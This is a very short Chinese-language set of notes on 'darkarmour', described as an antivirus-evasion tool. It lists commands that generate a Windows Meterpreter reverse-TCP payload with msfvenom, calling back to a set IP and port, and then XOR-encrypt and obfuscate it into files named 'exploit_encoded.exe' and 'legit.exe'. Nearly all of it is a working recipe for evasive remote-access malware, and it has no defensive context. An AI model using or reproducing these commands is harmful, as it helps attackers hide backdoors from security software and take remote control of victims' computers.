darkarmour是一个免杀工具
docker build .
docker run -it xxxxxx bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.160.129 LPORT=4444 -f exe -o exploit.exe
python3 darkarmour.py -f /root/exploit.exe -e xor -j -k darkbyte -l 500 -u -o /root/exploit_encoded.exe
或者
python3 darkarmour.py -f /root/exploit.exe --encrypt xor --jmp -o bins/legit.exe --loop 5